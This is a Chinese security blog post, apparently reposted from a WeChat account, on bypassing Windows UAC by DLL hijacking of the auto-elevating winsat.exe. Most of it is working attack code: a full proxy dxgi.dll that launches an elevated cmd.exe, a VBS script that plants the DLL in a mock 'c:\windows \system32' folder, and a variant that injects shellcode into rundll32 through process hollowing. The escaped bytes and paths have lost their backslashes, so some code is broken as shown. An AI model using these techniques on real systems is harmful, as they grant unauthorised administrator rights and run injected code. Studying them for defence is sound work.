0x11 UAC简介
用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
UAC需要授权的动作包括:
1.配置Windows Update
2.增加或删除用户账户
3.改变用户的账户类型
4.改变UAC设置
6.安装ActiveX
6.安装或移除程序
7.安装设备驱动程序
8.设置家长控制
9.将文件移动或复制到Program Files或Windows目录
10.查看其他用户文件夹
效果如下:
而UAC也是区分等级的,具体设置如下
为什么有的应用程序不需要提示UAC??
一句话解释就是因为有的可以程序可以autoElevate(自动提升)
这也是我们常用的几种uac bypass的手法之一.常见手法如下
1.白名单提权机制 - autoElevate
2.DLL 劫持
3.Windows 自身漏洞提权
4.远程注入
5.COM 接口技术
具有autoElevate属性True的应用程序会在启动时自动提升权限,而这些应用程序往往都具备微软的签名,微软认为它是可信的。故此,在该程序启动时,将会以管理员身份启动,假设我们通过COM技术或者DLL劫持该应用程序,也能够获得管理员权限,但分析成本,利用难度也都是很高的。
0x12 BypassUAC
下面我们来查找一下具有该权限的应用程序,并利用DLL劫持的方法来bypassUAC,关于DLL劫持的原理这里不再论述,网上已经有多相关的文章了。
strings.exe -s *.exe | findstr /i autoelevate
我们最后选择了winsat.exe这个程序作为我们的劫持程序,下面就是查看该程序会加载的DLL。
发现其会加载dxgi.dll。
下面就是需要编写我们的dll了,原理如下(图来自国外)
可以通过dllexp来查看dll内的函数
你可以自行编写所需要的dll,也可以使用一些自动化工具来生成所需的dll。中间也是出了很多问题,多亏了团队的wlpz师傅的指点,我这里最后的目的就是使用dll劫持来运行一个cmd,所以最后的主要代码如下:
EXTERNC{FARPROC Hijack_ApplyCompatResolutionQuirking;FARPROC Hijack_CompatString;FARPROC Hijack_CompatValue;FARPROC Hijack_CreateDXGIFactory;FARPROC Hijack_CreateDXGIFactory1;FARPROC Hijack_CreateDXGIFactory2;FARPROC Hijack_DXGID3D10CreateDevice;FARPROC Hijack_DXGID3D10CreateLayeredDevice;FARPROC Hijack_DXGID3D10GetLayeredDeviceSize;FARPROC Hijack_DXGID3D10RegisterLayers;FARPROC Hijack_DXGIDeclareAdapterRemovalSupport;FARPROC Hijack_DXGIDumpJournal;FARPROC Hijack_DXGIGetDebugInterface1;FARPROC Hijack_DXGIReportAdapterConfiguration;FARPROC Hijack_PIXBeginCapture;FARPROC Hijack_PIXEndCapture;FARPROC Hijack_PIXGetCaptureState;FARPROC Hijack_SetAppCompatStringPointer;FARPROC Hijack_UpdateHMDEmulationStatus;}namespace DLLHijacker{HMODULE m_hModule = NULL;DWORD m_dwReturn[17] = {0};inline BOOL WINAPI Load(){TCHAR tzPath[MAX_PATH];lstrcpy(tzPath, TEXT("dxgi"));m_hModule = LoadLibrary(tzPath);if (m_hModule == NULL)return FALSE;return (m_hModule != NULL);}FARPROC WINAPI GetAddress(PCSTR pszProcName){FARPROC fpAddress;CHAR szProcName[16];fpAddress = GetProcAddress(m_hModule, pszProcName);if (fpAddress == NULL){if (HIWORD(pszProcName) == 0){wsprintf((LPWSTR)szProcName, L"%d", pszProcName);pszProcName = szProcName;}ExitProcess(-2);}return fpAddress;}}using namespace DLLHijacker;void StartProcess(){STARTUPINFO startInfo = { 0 };PROCESS_INFORMATION procInfo = { 0 };WCHAR cmdline[] = L"cmd.exe";CreateProcess(cmdline, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &startInfo, &procInfo);}BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:{DisableThreadLibraryCalls(hModule);if(Load()){Hijack_ApplyCompatResolutionQuirking = GetAddress("ApplyCompatResolutionQuirking");Hijack_CompatString = GetAddress("CompatString");Hijack_CompatValue = GetAddress("CompatValue");Hijack_CreateDXGIFactory = GetAddress("CreateDXGIFactory");Hijack_CreateDXGIFactory1 = GetAddress("CreateDXGIFactory1");Hijack_CreateDXGIFactory2 = GetAddress("CreateDXGIFactory2");Hijack_DXGID3D10CreateDevice = GetAddress("DXGID3D10CreateDevice");Hijack_DXGID3D10CreateLayeredDevice = GetAddress("DXGID3D10CreateLayeredDevice");Hijack_DXGID3D10GetLayeredDeviceSize = GetAddress("DXGID3D10GetLayeredDeviceSize");Hijack_DXGID3D10RegisterLayers = GetAddress("DXGID3D10RegisterLayers");Hijack_DXGIDeclareAdapterRemovalSupport = GetAddress("DXGIDeclareAdapterRemovalSupport");Hijack_DXGIDumpJournal = GetAddress("DXGIDumpJournal");Hijack_DXGIGetDebugInterface1 = GetAddress("DXGIGetDebugInterface1");Hijack_DXGIReportAdapterConfiguration = GetAddress("DXGIReportAdapterConfiguration");Hijack_PIXBeginCapture = GetAddress("PIXBeginCapture");Hijack_PIXEndCapture = GetAddress("PIXEndCapture");Hijack_PIXGetCaptureState = GetAddress("PIXGetCaptureState");Hijack_SetAppCompatStringPointer = GetAddress("SetAppCompatStringPointer");Hijack_UpdateHMDEmulationStatus = GetAddress("UpdateHMDEmulationStatus");StartProcess();}}case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}
但是这里又碰上了一个问题,一般这种系统的dll都是需要权限才能更改、移动的,劫持的话就需要做一些操作,不过好在发现了一个vbs脚本,可以帮助我们来完成这个操作,免除权限问题,代码很简单,就不赘述了
Set oFSO = CreateObject("Scripting.FileSystemObject")Set wshshell = wscript.createobject("WScript.Shell")' Get target binary and payloadWScript.StdOut.Write("System32 binary: ")strBinary = WScript.StdIn.ReadLine()WScript.StdOut.Write("Path to your DLL: ")strDLL = WScript.StdIn.ReadLine()' Create foldersConst target = "c:windows "target_sys32 = (target & "system32")target_binary = (target_sys32 & strBinary)If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End IfIf Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If' Copy legit binary and evil DLLoFSO.CopyFile ("c:windowssystem32" & strBinary), target_binaryoFSO.CopyFile strDLL, target_sys32' Run, Forrest, Run!wshshell.Run("""" & target_binary & """")' Clean filesWScript.StdOut.Write("Clean up? (press enter to continue)")WScript.StdIn.ReadLine()wshshell.Run("powershell /c ""rm -r """"\?" & target & """""""")
最后的效果如下
如果需要加载shellcode,可以改写里面的函数,比如变成下面这样
void StartProcess(){unsigned char shellcode_calc[] ="xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52""x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48""x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9""x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41""x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48""x01xd0x8bx80x88x00x00x00x48x85xc0x74x67x48x01""xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48""xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0""xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4c""x24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0""x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04""x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59""x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48""x8bx12xe9x57xffxffxffx5dx48xbax01x00x00x00x00""x00x00x00x48x8dx8dx01x01x00x00x41xbax31x8bx6f""x87xffxd5xbbxf0xb5xa2x56x41xbaxa6x95xbdx9dxff""xd5x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb""x47x13x72x6fx6ax00x59x41x89xdaxffxd5x63x61x6c""x63x2ex65x78x65x00";TCHAR CommandLine[] = TEXT("c:\windows\system32\rundll32.exe");CONTEXT Context;struct _STARTUPINFOA StartupInfo;struct _PROCESS_INFORMATION ProcessInformation;LPVOID lpBaseAddress;ZeroMemory(&StartupInfo, sizeof(StartupInfo));StartupInfo.cb = 104;if (CreateProcess(0, CommandLine, 0, 0, 0, 0x44, 0, 0, (LPSTARTUPINFOW)&StartupInfo, &ProcessInformation)) {Context.ContextFlags = 1048579;GetThreadContext(ProcessInformation.hThread, &Context);lpBaseAddress = VirtualAllocEx(ProcessInformation.hProcess, 0, 0x800u, 0x1000u, 0x40u);WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, &shellcode_calc, 0x800u, 0);Context.Rip = (DWORD64)lpBaseAddress;SetThreadContext(ProcessInformation.hThread, &Context);ResumeThread(ProcessInformation.hThread);CloseHandle(ProcessInformation.hThread);CloseHandle(ProcessInformation.hProcess);}}
写在后面,当时学习该方法时,发现该作者已经整理了一份可劫持的系统表,地址如下;
https://github.com/wietze/windows-dll-hijacking/blob/master/dll_hijacking_candidates.csv
有兴趣的可以复现看看.
参考文章:
https://payloads.online/archivers/2018-12-22/1#0x12-bypass-uac%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F
https://payloads.online/archivers/2020-03-02/2
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
本文始发于微信公众号(鸿鹄实验室):bypassUAC && DLL劫持
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论